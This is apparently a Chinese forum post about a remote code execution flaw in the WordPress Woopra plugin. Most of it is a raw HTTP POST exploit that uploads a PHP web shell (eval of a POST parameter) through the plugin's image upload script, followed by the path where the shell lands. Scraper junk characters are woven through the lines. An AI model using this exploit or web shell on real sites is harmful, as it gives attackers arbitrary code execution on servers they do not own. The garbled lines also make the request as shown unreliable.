照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/ 5 {- f! G- c; y B* v6 I- X
此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
+ I2 L1 o: y M6 h$ W; texp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
8 C! Q: A- c/ H. VHost: ha.cker.in
' _: \% B. {% Q t6 Y. TProxy-Connection: keep-alive! M! w S# @* `3 q
Cache-Control: max-age=0
3 n+ B+ @5 w. N5 k d; TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 [. _6 v) A; {4 g( l7 Q
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
6 p8 U- T; A; QAccept-Encoding: gzip,deflate,sdch+ `( S/ D5 E3 q/ [+ }; ~
Accept-Language: zh-CN,zh;q=0.8
& B, ?9 P* e+ l% p+ [& @Content-Length: 28 <?php eval($_POST['cmd']); ?> 3 e( a, R0 E) s
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php& k+ A, D* O/ w- B# n
|